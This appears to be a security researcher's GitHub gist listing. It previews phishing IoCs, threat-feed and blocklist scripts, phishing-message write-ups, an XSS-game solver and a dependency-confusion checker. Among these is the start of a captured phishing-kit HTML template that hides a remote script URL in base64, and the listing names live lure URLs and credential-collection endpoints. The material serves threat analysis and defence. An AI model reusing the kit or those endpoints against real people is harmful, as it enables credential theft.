The following portal is using microsoft forms to send out the emails to potential victims. Form URL: https://ncv.microsoft.com/xfzlQmbcLr Portal URL: https://27-02-0-f39h5r8g-wrfgw0e8c3-t0rf7-0wrg-g7.obs.ap-southeast-2.myhuaweicloud.com/vt65g-09we-0t9hng-0w9rmvfj-e09thg-9rjfg9-er.html?AWSAccessKeyId=FQWNSQAJNPZJXV8B91KK&Expires=1677494075&Signature=cBYwgWA9mU%2BlQTS/FMhe6QYGcoE%3D POST location: https://techsmashwru.ru/.cas/next.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
folder_prefix="./feeds/" # $(date +%Y/%m/%d) | |
mkdir -p ${folder_prefix} | |
rm -f ${folder_prefix}/*.txt | |
curl -L -s https://phishing.army/download/phishing_army_blocklist_extended.txt -o ${folder_prefix}/phishing_army_domains.txt | |
curl -L -s https://hole.cert.pl/domains/domains.csv | cut -f 2 > ${folder_prefix}/cert_pl_domains.txt | |
curl -L -s https://urlabuse.com/public/data/phishing_url.txt -o ${folder_prefix}/urlabuse_urls.txt | |
curl -L -s https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -o ${folder_prefix}/threatview_domains.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
scrapy () { | |
get \ | |
--mirror \ | |
--no-clobber \ | |
--page-requisites \ | |
--adjust-extension \ | |
--convert-links \ | |
--restrict-file-names=windows \ | |
--domains=$1 \ | |
--no-parent \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<meta charset="UTF-8"> | |
<script> | |
let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address | |
let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank | |
let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here |
This is the contents from a phishing attemt I had recieved recently.
- Recieve an attachment.html usually from a free email service.
- The email contains html file with encoded JS that would call http://angelotti.it/cms/moj1.js
- Once you open the html file an outlook login portal will be visualized to authenticate.
IoCs:
Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.
The initial message said:
Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR
The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import time | |
import urllib.parse | |
from bs4 import BeautifulSoup | |
from selenium import webdriver | |
from selenium.common.exceptions import NoAlertPresentException | |
url = "https://xss-game.appspot.com/level1/frame" | |
response = requests.get(url) | |
soup = BeautifulSoup(response.text) |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Source https://github.com/Esox-Lucius/PiHoleblocklists | |
0-800-email.com | |
0-aprcredit-card.website | |
0-aprcredit-cards.website | |
0-aprcreditcard.website | |
0-aprcreditcards.website | |
0-secure-paypal.com | |
0.0.0.0 0-0.028.openvpn.cloud.btcchina.com | |
0.0.0.0 0-100-195.btcc.com | |
0.0.0.0 0-100-bhd.foxypool.cf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
# https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/ | |
# The following script finds all package.json files in the current dir and checks if there are referenced any | |
# dependencies that no public package is available for, making your application vulnerable to supply-chain attack. | |
# Simply run ./packagejson.py in your root repository direcotory. | |
import json | |
import requests | |
from pathlib import Path | |
import urllib.parse |
NewerOlder